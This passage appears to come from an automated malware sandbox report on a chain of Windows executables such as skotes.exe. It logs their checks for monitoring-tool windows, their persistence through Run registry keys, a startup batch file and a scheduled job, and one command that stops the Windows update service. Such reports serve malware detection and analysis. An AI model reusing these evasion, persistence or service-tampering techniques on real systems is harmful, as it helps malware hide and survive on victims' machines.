Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe	Window searched: window name: FilemonClass
Source: C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe	Window searched: window name: RegmonClass
Source: C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe	Window searched: window name: FilemonClass
Source: C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Window searched: window name: Regmonclass

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat

Jump to behavior

Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bb6a39dc63.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bb6a39dc63.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 23a60cad74.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 23a60cad74.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4fc87a30ef.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4fc87a30ef.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1038363cd2.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1038363cd2.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe

Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
